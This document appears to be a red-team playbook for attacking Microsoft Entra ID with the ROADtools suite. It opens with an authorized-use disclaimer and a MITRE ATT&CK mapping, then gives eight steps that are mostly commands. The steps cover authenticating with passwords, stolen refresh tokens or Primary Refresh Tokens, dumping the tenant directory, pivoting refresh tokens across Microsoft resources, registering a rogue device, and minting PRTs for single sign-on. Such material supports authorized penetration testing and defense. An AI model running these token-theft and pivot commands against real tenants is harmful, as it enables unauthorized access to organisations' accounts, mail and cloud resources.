| name | attacking-entra-id-with-roadtools |
| description | Enumerate Entra ID with ROADrecon and acquire and exchange tokens with roadtx. |
| domain | cybersecurity |
| subdomain | identity-access-management |
| tags | ["red-team","entra-id","azure-ad","roadtools","token-manipulation","cloud-enumeration","primary-refresh-token","identity-attack"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | ["ID.AM-03"] |
| mitre_attack | ["T1087.004"] |
Attacking Entra ID with ROADtools
Authorized use only: ROADtools interacts with live Microsoft Entra ID (Azure AD) tenants and can register devices, mint and exchange tokens, and enumerate directory objects. Use it solely against tenants you own or are explicitly authorized in writing to test. Unauthorized access to a cloud tenant is illegal.
Overview
ROADtools (by Dirk-jan Mollema) is the de facto offensive toolkit for Microsoft Entra ID. It has two main components:
- ROADrecon — authenticates to Entra ID, gathers the full directory into a local SQLite database via the Azure AD Graph API, and serves an Angular GUI to explore users, groups, roles, applications, service principals, conditional-access policies, and device objects offline. A plugin system exports to BloodHound and analyzes CA policies.
- roadtx (ROADtools Token eXchange) — acquires and exchanges Entra-issued tokens across the many OAuth flows (ROPC, device code, auth-code, refresh-token exchange, app/federated app), performs device registration, and handles Primary Refresh Token (PRT) operations including PRT-based SSO and cookie minting. Its FOCI (Family of Client IDs) awareness lets a refresh token for one first-party client be redeemed for another resource.
Together they cover the Discovery phase against cloud identity: enumerate the tenant (T1087.004 Account Discovery: Cloud Account) and obtain/manipulate the tokens needed to reach Microsoft Graph, Azure Resource Manager, and other resources. ROADrecon's offline database makes recon stealthy and fast; roadtx makes token theft, PRT abuse, and cross-resource pivoting practical.
When to Use
- During an authorized Azure / Entra ID red-team or cloud penetration test.
- When you have a foothold credential, refresh token, or PRT and need to enumerate the tenant.
- When you must pivot a token from one resource (e.g., Azure CLI) to another (e.g., Microsoft Graph).
- When validating that conditional-access, device-compliance, and token controls actually constrain an attacker.
- When mapping Entra attack paths (export to BloodHound for graph analysis).
Prerequisites
- Written authorization and defined scope for the target tenant.
- A starting credential: username/password (no MFA flows), a device code session, a refresh/access token, or a registered device's PRT.
- Python 3.7+ (roadtx Selenium flows need a matching geckodriver/Firefox).
python -m pip install roadrecon
python -m pip install roadtx
roadrecon --help
roadtx --help
Objectives
- Authenticate to Entra ID via the appropriate flow (device code preferred for MFA).
- Gather the full directory with ROADrecon and analyze it in the GUI.
- Export the directory to BloodHound and run CA-policy analysis plugins.
- Acquire tokens with roadtx and exchange refresh tokens across resources/clients.
- Demonstrate PRT-based SSO and document the resulting access.
MITRE ATT&CK Mapping
| ID | Tactic | Official Technique Name | Role in this skill |
|---|
| T1087.004 | Discovery | Account Discovery: Cloud Account | ROADrecon enumerates tenant users/accounts |
| T1069.003 | Discovery | Permission Groups Discovery: Cloud Groups | ROADrecon enumerates Entra groups and roles |
| T1538 | Discovery | Cloud Service Dashboard | GUI exploration of tenant configuration |
| T1550.001 | Defense Evasion / Lateral Movement | Use Alternate Authentication Material: Application Access Token | roadtx refresh-token exchange across resources |
| T1528 | Credential Access | Steal Application Access Token | roadtx PRT/token acquisition |
Workflow
Step 1: Authenticate with ROADrecon
Pick the flow that matches your foothold. Device code supports MFA; ROPC (-u/-p) does not.
roadrecon auth -u user@tenant.onmicrosoft.com -p 'Password123!'
roadrecon auth --device-code
roadrecon auth --access-token <JWT>
roadrecon auth --refresh-token <refresh_token>
roadrecon auth --prt <prt> --prt-sessionkey <session_key>
Authentication writes .roadtools_auth in the working directory.
Step 2: Gather the directory
roadrecon gather
roadrecon gather --mfa
Step 3: Explore in the GUI
roadrecon gui
Step 4: Run analysis plugins
roadrecon plugin policies -h
roadrecon plugin policies
roadrecon plugin bloodhound -h
roadrecon plugin bloodhound
Step 5: Acquire tokens with roadtx
roadtx gettokens -u user@tenant.com -p 'Password123!' -c azcli -r msgraph
roadtx interactiveauth -c msteams -r msgraph
roadtx gettokens --refresh-token <refresh_token> -r msgraph
Tokens are written to .roadtools_auth (use --tokens-stdout to print).
Step 6: Exchange refresh tokens across resources (FOCI pivot)
A FOCI refresh token obtained for one first-party client can be redeemed for another resource without re-auth.
roadtx refreshtokento -r azrm
roadtx refreshtokento -c msteams -r msgraph
roadtx getscope -s https://graph.microsoft.com/mail.read --foci
Step 7: Device registration and PRT-based SSO
roadtx device -n redteam-device
roadtx prt -u user@tenant.com -p 'Password123!' --key-pem redteam-device.key --cert-pem redteam-device.pem
roadtx prtauth -c msteams -r msgraph
roadtx prtenrich -u user@tenant.com
Step 8: Inspect tokens
roadtx describe -t <JWT>
roadtx describe < .roadtools_auth | jq .
Tools and Resources
Validation Criteria